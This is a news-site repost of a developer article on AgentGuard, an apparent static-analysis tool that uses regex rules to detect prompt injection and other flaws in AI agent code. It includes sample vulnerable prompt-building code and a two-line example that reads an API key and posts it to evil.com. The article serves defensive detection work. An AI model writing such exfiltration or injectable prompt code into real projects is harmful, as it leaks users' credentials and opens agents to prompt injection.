Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

wpnews.pro

cd /news/ai-safety/beyond-regex-building-detection-rule… · home › topics › ai-safety › article

[ARTICLE · art-42735] src=dev.to ↗ pub=2026-06-28T22:45Z topic=ai-safety verified=true sentiment=↑ positive

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

read2 min views1 publishedJun 28, 2026

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

Regex has limits. Consider:

prompt = f"You are a helper. {user_input}"

template = "You are a helper. {input}"
prompt = template.format(input=user_data)

messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding .format()

semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: AST-based semantic analysis.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

user_input

, query

, message

, request.body

openai.chat.completions.create

, prompt

, messages

, system

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

api_key = os.environ.get("API_KEY")

requests.post("https://evil.com/collect", headers={"Auth": api_key})

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.

Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 categories:

ASI	Rule	Detection Method
ASI01	Prompt Injection	Regex (f-string, concat, format)
ASI02	Tool Abuse	Regex (os.system, subprocess, eval)
ASI03	Data Exfiltration	Regex + cross-line correlation
ASI04	Excessive Agency	Regex (auto-execute, no-confirm)
ASI05	Supply Chain	Regex (untrusted pip install, dynamic import)
ASI06	Insecure Output	Regex (raw HTML, eval output)
ASI07	Credential Exposure	Regex (API keys, private keys, passwords)
ASI08	Context Manipulation	Regex (context stuffing, token bombing)
ASI09	Agent Loop Exploitation	Regex (recursive calls, no depth limit)
ASI10	Trust Boundary	Regex (mixed privilege, cross-agent calls)

The benchmark suite has 28 samples:

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard

source & further reading

dev.to — original article How I Built a Visa Tracker with Django, Aurora PostgreSQL, and react Every Dream Has a Limit I built an AI code documentation tool to clean messy code with zero documentation.

~/api · this article 200

$curl api.wpnews.pro/v1/news/beyond-regex-building-de…

Read original on dev.to → dev.to/dockfixlabs/beyond-regex-building-detecti…

mentioned entities

AgentGuard

Dockfix Labs

Semgrep

CodeQL

ASI01

ASI03

Python

JavaScript

metadata

slugbeyond-regex-building-detection-rules-for-ai-agent-vulnerabilities

topic#ai-safety

secondary4 topics

sentimentpositive

canonicaldev.to

navigation

← prevAgentGuard: Open-Source Security…

next →Democratic lawmakers push federa…

── more in #ai-safety 4 stories · sorted by recency

dev.to · 28 Jun · #ai-safety

AgentGuard: Open-Source Security Scanning for AI Agent Code

slashdot.org · 28 Jun · #ai-safety

China's AI Matches Anthropic in Cybersecurity, Causing Worry Over US Restrictions

lesswrong.com · 28 Jun · #ai-safety

What comes with cheap math?

startupfortune.com · 28 Jun · #ai-safety

AI coding agents are turning code review into the next startup risk

── more on @agentguard 3 stories trending now

wpnews · 25 May · #artificial-intelligence

Maia-3: free and open source

wpnews · 28 May · #ai-startups

[AINews] Cognition raises $1B in $26B Series D

wpnews · 5 Jun · #ai-agents

Miasma Worm Targets AI Coding Agents via GitHub Repos

sponsored brought to you by zahid.host 4,200+ EU-deployed projects

reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main

→ Live at https://your-agent.zahid.host ✓

Get free account → Pricing

from €0/mo · no card required